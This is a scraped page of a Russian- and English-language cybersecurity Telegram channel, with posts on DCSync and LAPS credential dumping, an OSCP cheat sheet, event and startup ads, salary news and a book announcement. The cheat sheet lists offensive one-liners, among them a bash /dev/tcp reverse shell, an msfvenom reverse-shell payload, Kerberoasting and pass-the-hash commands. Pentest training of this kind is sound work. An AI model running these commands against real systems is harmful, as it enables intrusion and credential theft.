white2hack 📚 – Telegram
white2hack 📚
12.7K subscribers
4.8K photos
135 videos
1.96K files
2.26K links
Кибербез. Книги, гайды, how to, ликбез. Аналитика, тренды, карьера, эвенты. Этичный хакинг и защита своих данных

🔊 Связь @w2hack_feed_bot
💬 Чат https://news.1rj.ru/str/+VdkEIWudTi5m3dsA
💡 Консультация https://forms.gle/iB9iX3BwyxJM4Ktx5
🏛 Обмен -- private --
Download Telegram
Credential Dumping: DCSync Attack

Active Directory Credential Dumping DCSync Attack is a specialized technique used by attackers to extract credentials from a domain controller (DC) by simulating the behavior of a domain controller itself.

🛠 Setting up a lab environment to simulate the attack
📚 Understanding the DRS protocol and how the attack works
🔍 Why such misconfigurations occur in real-world scenarios
💣 Exploiting the misconfiguration
🗺 Mapping the attack to MITRE ATT&CK
👁 Detecting the attack
🛡 Mitigation strategies

👁 Lab Setup
Requirements:
• A virtualized environment (e.g., VMware, VirtualBox, or Hyper-V).
• Windows Server configured as a Domain Controller.
• A Windows client machine.
• Tools: Impacket, Mimikatz, Netexec, and Metasploit.

🛠 Steps:
Domain Controller Configura􀆟on:
• Install and configure Windows Server as a DC where domain name is ignite.local and IP is defined as sta􀆟c 192.168.1.48.
• Set up Ac􀆟ve Directory (AD) with a few users and groups.

#windows
1🔥5🙈21👍1👏1
Credential Dumping_DCSync Attack_2025.pdf
2.4 MB
Credential Dumping: DCSync Attack
👍31🔥1😱1
Credential Dumping LAPS

In this ar􀆟cle, we will be discussing the concept of Credential Dumping and LAPS (Local Administrator Password Solution). We will delve into the world of password management and explore how LAPS can help mi􀆟gate the risks associated with using shared local accounts and passwords across a domain. With the increasing threat of cyber attack's, it's essential to understand the importance of secure password management and how LAPS can help streamline this process.

The Local Administrator Password Solution (LAPS) is a tool designed to manage local account passwords for computers joined to a domain. It securely stores these passwords in Ac􀆟ve Directory (AD) and protects them using Access Control Lists (ACLs). Consequently, only authorized users can access or reset them.

In setups where users must log into computers without domain credentials, managing passwords can become challenging and heighten the risk of Pass-the-Hash (PtH) atacks. Therefore, LAPS addresses the problem of using a shared local account with the same password across all computers in a domain. It assigns a unique, randomly generated password to the local administrator account on each machine. As a result, domain administrators can control which users, such as helpdesk staff, can view these passwords.

#windows
❤‍🔥4🙈2
Credential Dumping LAPS.pdf
3.4 MB
Credential Dumping LAPS
1👍5🔥1
OSCP Cheat Sheet: Your Ultimate Penetration Testing Guide for Windows and Linux

Preparing for the OSCP exam or diving into penetration testing? Here’s a quick rundown of essential tools, commands, and techniques to help you succeed!

🔍 Recon & Enumeration
Nmap: nmap -sV -p- <IP> (Full scan)
SMB: crackmapexec smb <IP> -u user -p pass --shares
HTTP: gobuster dir -u http://<IP> -w wordlist.txt

⚡️ Exploitation
Reverse Shells:
Bash: bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
MSFVenom: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
Privilege Escalation:
Windows: Check winpeas.exe or powerup.ps1
Linux: sudo -l or find / -perm -u=s -type f 2>/dev/null

🔑 Password Cracking
John: john --wordlist=rockyou.txt hash
Hashcat: hashcat -m 1000 hash.txt wordlist.txt

🛠 Active Directory
Kerberoasting: impacket-GetUserSPNs -dc-ip <DC-IP> domain/user:pass -request
Pass-the-Hash: psexec.[py]-hashes LM:NTLM user@target

📌 Pro Tips:
Always check /etc/passwd, registry keys, and scheduled tasks for privesc paths.
Use tools like BloodHound for AD mapping and Mimikatz for credential dumping.

1010111 1101000 1101001 1110100 1100101 110010 1101000 1100001 1100011 1101011

#pentest #exam
1❤‍🔥5🔥1
OSCP Cheat Sheet_Your Ultimate Penetration Testing Guide.pdf
1.5 MB
OSCP Cheat Sheet: Your Ultimate Penetration Testing Guide for Windows and Linux
🔥7❤‍🔥21
🔄 Результаты и отчет о третьей ежегодной церемонии награждения Pentest award 2025 🔄

Pentest award уже третий год отмечает талантливых специалистов, которые делают огромную работу по поиску уязвимостей, оставаясь за кадром.

Важен сам подход и идея, необычные ресерчи и методики. Приз за победу — фирменная именная статуэтка и макбук. За второе место — айфон, а за третье — смарт-часы.

➡️ Читать на Хабре + ][akep

#event
Please open Telegram to view this post
VIEW IN TELEGRAM
👎4👍32🔥2🤝1
💻 Дорогу талантам, новым возможностям, реальным перспективам, свежим технологиям и открытиям - МЫ ПРИГЛАШАЕМ В ИТ-АКСЕЛЕРАТОР KrokIT

➡️Кто мы такие? ➡️
KrokIT
— стартап-акселератор с корнями из Беларуси, созданный бизнес-инкубатором «С нами будущее». Цель — помочь стартапам быстро добиться успеха, снизить риски и повысить привлекательность для инвесторов.

💻 Если ты в РФ, Европе и США, у тебя есть идея или MVP, ты готов делать высокотехнологичный бизнес - мы тебя ждем!

С нами мы тебе гарантируем:
🔼 первая прибыль (для стартапов, пришедших на стадии идеи);
🔼 увеличение прибыли (для уже работающих стартапов);
🔼 помощь в масштабировании стартапа на зарубежные рынки (США);
🔼 формирование сильной и эффективной команды (6-месячное обучение, менторинг, нетворкинг);
🔼 продвижение продукта или услуги (СМИ, интернет пиар, Demo Day, выставки);
🔼 экспертная поддержка на протяжении всего обучения и после его окончания.

Подача заявки:
➡️Подать заявку на участие можно на сайте акселератора. Программа подбирается в зависимости от стадии стартапа — идея, MVP, продажи, масштабирование.
➡️ Если стартап не получит первую прибыль или не увеличит прибыль в 2 раза, акселератор возвращает оплату: деньги или долю в проекте (согласно заключенного контракта).

📢📢 За первично консультацией по подготовке заявки (call for paper) и подробностями сотрудничества - обращайтесь в директ канала W2hack

🔝
Главная страница (FB + YT + LnkdIn)
💻 English page

#info #startup #world
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👎3🤔2
🔥 Зарплаты в Microsoft: сколько получают программисты в 2025 году 🔥

В сеть попали внутренние инструкции Microsoft по оплате труда технических специалистов, которые дают представление о реальных зарплатах и бонусах в одной из крупнейших ИТ-компаний.

В Microsoft действует система уровней (грейдов), отражающая должность и опыт сотрудника. Уровни 57–59 соответствуют джуниорам, уровень 63 считается отправной точкой для сеньоров, а с 65-го начинается «принципальный» (principal) уровень. Еще выше — партнеры (68) и признанные эксперты (distinguished, 70).

Например, инженер на самом высоком уровне 70 может получать до $408 000 в год (в зависимости от локации), а также получить разовую акционную премию при найме до $1,9 миллиона и ежегодные акции на сумму до $1,476 миллиона. Для новичков (уровень 57) «главный» диапазон зарплаты составляет от $83 000 до $108 000, а в городах с высоким уровнем жизни — от $95 800 до $124 600. При найме им также полагаются бонус и пакет акций.

❗️ Источник

#analytics #world
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯42👍2
Несколько cheat sheet по Ассемблеру x86 (Assembler)

#coding
8
This media is not supported in your browser
VIEW IN TELEGRAM
Programming "Hello World" via python VS javanoscript VS java VS assembly coding

💻💻💻

#fun
Please open Telegram to view this post
VIEW IN TELEGRAM
😁5👻43
ЯВОВА русский FAANG. Почему я больше не мечтаю о работе в БигТех, оригинальный пост Artur Kiurebegov

Когда-то БигТех казался мне вершиной IT-карьеры:
крутые задачи,
умные люди,
престиж,
высокий уровень жизни.

Но спустя годы в индустрии, я переосмыслил, чего хочу от работы.
Вот почему для меня БигТех больше не цель:

🔥 1. Хардкор — не всегда кайф
Сложные системы, многослойные процессы, кросс-командные конфликты, бюрократия. Не всегда ты «строишь ракету», иногда — просто бьёшься о стену.

📊 2. Ценность ≠ масштаб
В небольших командах ты чувствуешь вклад каждый день. В FAANG можно годами пилить фичу, которую никто не заметит.

🧠 3. Не хочу тратить жизнь на лики и промо
Гонки за грейдом, «системы баллов», борьба за внимание менеджеров. Я хочу расти как специалист, а не играть в корпоративные шахматы.

🌍 4. Гибкость и свобода — важнее бренда
Удалёнка, work-life баланс, адекватные люди и понятные процессы — вот что стало для меня приоритетом.

💡 5. Мне важнее смысл, а не логотип на резюме
Я хочу делать продукты, которые реально кому-то помогают. И это не всегда про большие корпорации.

БигТех — это круто. Но не единственный путь. И уж точно не универсальный.


А вы как думаете — БигТех всё ещё must-have или переоценено?

#talk
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣7👍3🔥1👏1😁1🎉1🙏1🙈1
Защита систем. Чему «Звездные войны» учат инженера ПО, Адам Шостак, 2025

Практическое руководство по написанию безопасных приложений с помощью опыта мастеров-джедаев из «Звездных войн».

Чему могут научить R2-D2, Дарт Вейдер, Хан Соло или даже Йода в плане безопасности программного обеспечения? В книге «Защита систем: чему „Звездные войны“ учат инженеров ПО» дан целый арсенал стратегий и методов защиты, которые применимы не только в фантастическом мире, но и в реальных работающих системах.

Что внутри:
Легкость и польза: безопасный код приложений с использованием идей из вселенной «Звездных войн».
Практические модели безопасности: STRIDE и защита от злоумышленников.
Безопасность, удобство использования и быстрая доставка: увлекательная дорожная карта разработки современных приложений.
Закономерности проблем безопасности и оптимальные решения.

Адам Шостак – профессор Школы компьютерных наук и инженерии при Вашингтонском университете, эксперт по моделированию веб-угроз, гейм-дизайнер и судебный консультант. Много лет он посвятил разработке безопасных продуктов и систем. В мире бизнеса диапазон его опыта охватывает самые разные области, от основания стартапов до почти десяти лет работы в Microsoft. Помимо консультирования и преподавания, Шостак выступает в качестве советника по безопасности многих компаний.

#book #AppSec
5😁1
Zaschita_sistem_Chemu_Zvezdnyie_voynyi_uchat_inzhenera_PO.fb2
3.3 MB
Защита систем. Чему «Звездные войны» учат инженера ПО, Адам Шостак, 2025
👍3